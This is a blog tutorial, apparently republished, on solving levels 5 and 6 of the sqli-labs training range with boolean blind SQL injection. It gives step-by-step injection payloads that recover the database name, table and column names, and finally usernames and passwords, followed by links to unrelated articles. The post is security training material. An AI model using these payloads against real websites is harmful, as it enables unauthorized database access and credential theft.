SQL注入sqli_labs靶场第五、六题

SQL注入sqli_labs靶场第五、六题

article2024/11/25 19:34:07/文章来源:https://blog.csdn.net/2301_79355407/article/details/137613882

第五题

根据报错信息，判断为单引号注入

没有发现回显点

方法：布尔盲注（太耗时，不推荐使用）

1）猜解数据库名字：（所有ASCII码值范围：0~127）

?id=1' and length(database())=8--+

页面正常显示，则为true，数据库名字长度为8

页面错误显示，则为false，数据库名字长度不为8

?id=1' and ascii(mid(database(),1,1))>64--+ 正常

?id=1' and ascii(mid(database(),1,1))>100--+ 正常

?id=1' and ascii(mid(database(),1,1))=115--+ 正常

?id=1' and ascii(mid(database(),2,1))=101--+ 正常

?id=1' and ascii(mid(database(),3,1))=99--+ 正常

如此就得到了

第一个字符的ASCII码为115解码出来为“s”

第二个字符的ASCII码为101解码出来为“e”

第二个字符的ASCII码为99解码出来为“c”

依次类推出数据库的名字为“security”

2）猜解表名：（判断所有表名长度，依次猜解所有表名）

判断长度：

?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>29--+

猜解表名

?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>64 --+ 正常

?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+ 正常

说明第一个表第一个字符是r，依次猜解直到找到users表

3）猜解列名：（判断所有列名长度，依次猜解users表中列名）

判断长度：

?id=1' and length((select group_concat(column_name) from information_schema.columns where table_name='users'))>29--+

猜解列名：

?id=1' and ascii(mid((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))>64--+

4）猜解账号密码

?id=1' and ascii(mid((select group_concat(username,password) from users),1,1))>64--+

第六题

根据报错信息，判断为双引号注入

页面没有回显信息，采用布尔盲注，与第五题方法完全一致

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/532581.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

数字化浪潮下，制造业如何乘势而上实现精益生产

数字化浪潮下，制造业如何乘势而上实现精益生产

随着数字化技术的迅猛发展，制造业正迎来前所未有的变革机遇。本文将探讨如何利用数字化手段助推制造业实现精益生产，从而在激烈的市场竞争中脱颖而出。 1、构建智能化生产系统借助物联网技术，实现设备之间的互联互通，构建智能化…

阅读更多...

【Qt踩坑】ARM 编译Qt5.14.2源码-QtWebEngine

【Qt踩坑】ARM 编译Qt5.14.2源码-QtWebEngine

1.下载源码下载网站：Index of /new_archive/qt/5.14/5.14.2/single 2.QWebEngine相关依赖 sudo apt-get install flex libicu-dev libxslt-dev sudo apt-get install libssl-dev libxcursor-dev libxcomposite-dev libxdamage-dev libxrandr-dev sudo apt-get …

阅读更多...

3. Spring 注解存储对象 Bean的命名规范

3. Spring 注解存储对象 Bean的命名规范

从Java5.0开始，Java开始支持注解。Spring做为Java生态中的领军框架，从2.5版本后也开始支持注解。相比起之前使用xml来配置Spring框架，使用注解提供了更多的控制Spring框架的方式。 SpringFramework版本对应jdk版本重要特性SpringFramework 1…

阅读更多...

Linux——fork复制进程

Linux——fork复制进程

1)shell: 在计算机科学中，Shell俗称壳（用来区别于核），是指“为使用者提供操作界面”的软件（command interpreter，命令解析器）。它类似于DOS下的COMMAND.COM和后来的cmd.exe。它接收用户命令&…

阅读更多...

练习题（2024/4/10）

练习题（2024/4/10）

1. 删除有序数组中的重复项给你一个非严格递增排列的数组 nums ，请你原地删除重复出现的元素，使每个元素只出现一次 ，返回删除后数组的新长度。元素的相对顺序应该保持一致。然后返回 nums 中唯一元素的个数。考虑 nums 的唯一元…

阅读更多...

安装VMware ESXi虚拟机系统

安装VMware ESXi虚拟机系统

简介：ESXi是VMware公司开发的一款服务器虚拟化操作系统。它能够在一台物理服务器上运行多个虚拟机，每个虚拟机都可以独立运行操作系统和应用程序，而且对硬件配置要求低，系统运行稳定。准备工具： 1.8G或者8G以上容…

阅读更多...

查看TensorFlow已训模型的结构和网络参数

查看TensorFlow已训模型的结构和网络参数

文章目录概要流程概要通过以下实例，你将学会如何查看神经网络结构并打印出训练参数。流程准备一个简易的二分类数据集，并编写一个单层的神经网络 train_data np.array([[1, 2, 3, 4, 5], [7, 7, 2, 4, 10], [1, 9, 3, 6, 5], [6, 7, 8, 9, 10]]…

阅读更多...

MySQL高级（索引结构Hash，为什么InnoDB存储引擎选择使用B+tree索引结构？）

MySQL高级（索引结构Hash，为什么InnoDB存储引擎选择使用B+tree索引结构？）

目录 1、Hash索引结构 2、Hash索引特点 3、存储引擎支持 4、为什么InnoDB存储引擎选择使用Btree索引结构？ 1、Hash索引结构哈希索引就是采用一定的hash算法，将键值换算成新的hash值，映射到对应的槽位上，然后存储在hash表中。如…

阅读更多...

吴恩达机器学习-异常检测（Anomaly Detection）

吴恩达机器学习-异常检测（Anomaly Detection）

在本练习中，您将实现异常检测算法，并将其应用于检测网络上出现故障的服务器。文章目录 1-包2-异常检测2.1问题陈述2.2数据集2.3高斯分布2.2.1高斯实现的估计参数：2.2.2选择阈值𝜖 2.4高维数据集 1-包首先，让我们运…

阅读更多...

脑电放大 LM386

脑电放大 LM386

LM386介绍 LM386 是一种音频集成功放，具有自身功耗低、电压增益可调整电源电压范围大、外接元件少和总谐波失真小等优点，广泛应用于录音机和收音机之中。电源电压 4-12V 或 5-18V(LM386N-4);静态消耗电流为 4mA;电压增益为20-200dB;在引脚1和8开路时&a…

阅读更多...

Android开发基础：事件传递基于监听器的事件处理基于回调的事件处理

Android开发基础：事件传递基于监听器的事件处理基于回调的事件处理

目录一，事件传递机制 1.事件传递机制的三个方法 （1）public boolean dispatchTouchEvent（MotionEvent event） （2）public boolean onInterceptTouchEvent（MotionEvent event&…

阅读更多...

【C++题解】1601. 挖胡萝卜

【C++题解】1601. 挖胡萝卜

问题：1601. 挖胡萝卜类型：基本运算、小数运算题目描述： 小兔朱迪挖了 x 个胡萝卜，狐狸尼克挖到胡萝卜数量是小兔挖到的 3 倍，小羊肖恩挖到胡萝卜的数量比狐狸尼克少 8 个。请你编程计算一下狐狸尼克和小羊肖恩分别…

阅读更多...

时间系列预测总结

时间系列预测总结

转载自：https://mp.weixin.qq.com/s/B1eh4IcHTnEdv2y0l4MCog 拥有一种可靠的方法来预测和预测未来事件一直是人类的愿望。在数字时代，我们拥有丰富的信息，尤其是时间序列数据。时间序列是指基于时间刻度维度（天、月、年等&…

阅读更多...

Mybatis plus 使用通用枚举

Mybatis plus 使用通用枚举

说明：mybatis plus 使用枚举可实现数据库存入时指定值保存， 读取时指定值展示（返给前端） 可通过继承IEnum<T>、 EnumValue实现 1、引包 <dependency><groupId>mysql</groupId><artifactId>mysql-…

阅读更多...

java基础语法（16）| 集合

java基础语法（16）| 集合

前言 Hello，大家好！很开心与你们在这里相遇，我是一个喜欢文字、喜欢有趣的灵魂、喜欢探索一切有趣事物的女孩，想与你们共同学习、探索关于IT的相关知识，希望我们可以一路陪伴~ 1. 集合概述什么是集合集合：集合是java中提供的一种容器，可以用来存储多个数据,并且可以存…

阅读更多...

每天五分钟深度学习PyTorch：面对Tensorflow，为何我选择PyTorch

每天五分钟深度学习PyTorch：面对Tensorflow，为何我选择PyTorch

这篇专栏文章不是为了挑起tenserflow和pytorch中哪个更好，众所周知tensorflow诞生以来，已经成为最流行的深度学习框架，可以说github中大多数的深度学习代码实现是以tensorflow实现的，也就是说资源众多，社区强大&#x…

阅读更多...

自动化测试十大必备（背）面试题！【含答案精讲】

自动化测试十大必备（背）面试题！【含答案精讲】

🔥 交流讨论：欢迎加入我们一起学习！ 🔥 资源分享：耗时200小时精选的「软件测试」资料包 🔥 教程推荐：火遍全网的《软件测试》教程 📢欢迎点赞 👍 收藏 ⭐留言 &#x1…

阅读更多...

OJ 最大奖励 C Python【贪心算法】【动态规划】

OJ 最大奖励 C Python【贪心算法】【动态规划】

又接触到贪心算法啦，这道题有两种算法思路，我用两个语言来写了一下，这也涉及到了一些动态规划的思路一.从最后一个时间枚举，找到在这个时间内可以完成的最大分值的题注意点： 1.数组下标从1开始记录表示第几个时间…

阅读更多...

渲染农场实时画面怎么设置?云渲染农场实时预览效果查看

渲染农场实时画面怎么设置?云渲染农场实时预览效果查看

许多用户在使用渲染农场服务时，常常难以找到查看实时渲染画面的功能。由于渲染是一个时间消耗较大的任务，如果最终结果与预期不符，可能会对整个工作流程产生负面影响。因此，渲染平台若能提供实时预览渲染进度和效果的功能&#xf…

阅读更多...

冯喜运：4.10晚间黄金原油走势分析

冯喜运：4.10晚间黄金原油走势分析

黄金消息技术面分析：美国CPI年率创半年新高，美国3月未季调CPI年率录得3.5%，高于预期的3.4%水平，为2023年9月以来最高水平。美国CPI高于预期，现货黄金短线下挫16美元。日线当前的指标macd依旧属于金叉放量运行&#xff…

阅读更多...

最新文章